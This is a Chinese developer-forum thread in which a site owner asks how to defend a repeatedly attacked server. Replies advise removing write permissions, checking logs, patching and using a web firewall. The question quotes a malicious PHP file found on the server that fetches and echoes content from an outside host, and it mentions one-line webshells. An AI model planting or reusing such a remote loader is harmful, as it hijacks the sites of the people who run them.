最近发现服务器一个站点总是被攻击，有很多恶意代码，有啥有效的防范方法吗？

问答 / 0 / 12 / 创建于 1年前

恶意文件源码

<?php
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
echo file_get_contents("http://1.d986.top/");
?>

或者一句话木马

有没有啥好的办法：

防止上传恶意文件？；
防止扫描网站？
防止提取服务器权限？
等

服务器安全代码安全

课程读者 92 声望

暂无个人描述~

《L04 微信小程序从零到发布》

从小程序个人账户申请开始，带你一步步进行开发一个微信小程序，直到提交微信控制台上线发布。

《L03 构架 API 服务器》

你将学到如 RESTFul 设计风格、PostMan 的使用、OAuth 流程，JWT 概念及使用和 API 开发相关的进阶知识。

讨论数量: 12

Dash007

课程读者 74 声望

不给写入权限

1年前评论

巴啦啦

课程读者 206 声望 / 宇宙游民 @ 地球村

找到漏洞在哪里并补上，重置服务器，安装防护软件。

1年前评论

eanBear

7 声望

不给写权限
查请求日志，看入口在哪，如果是开源的代码尽量升级到最新版
查数据库有没有被加了管理员
换干净的系统重新部署，装防护软件

1年前评论

liaosp

课程读者 402 声望

大部分PHP程序员，都搞不懂如何安全代码部署

1年前评论

raybon

Laravel 8.x 译者 325 声望 / php @ 远程

安装防护软件，修改常用防火墙端口限制，限制ssh 端口连接

1年前评论

是阿东啊

课程读者 66 声望

上面该说的都说的差不多了，花点钱又省事的办法就是上web防火墙，脚本小子都能轻松搞定

1年前评论

hongfs

课程读者 43 声望

或者试一下最近挺火的，长亭雷池

1年前评论

liushuo

0 声望

看日志，有没有代码漏洞

1年前评论

laravelphp_game

课程读者 15 声望

mark

1年前评论

半人间

课程读者 183 声望

把服务器关掉

1年前评论

tomcath

Laravel 9.x 译者 193 声望

本来想看看木马长啥样，结果进不去，你们能进吗？

1年前评论

C_K

见习版主 6 声望

欢迎攻击

1年前评论

讨论应以学习和精进为目的。请勿发布不友善或者负能量的内容，与人为善，比聪明更重要！

帮助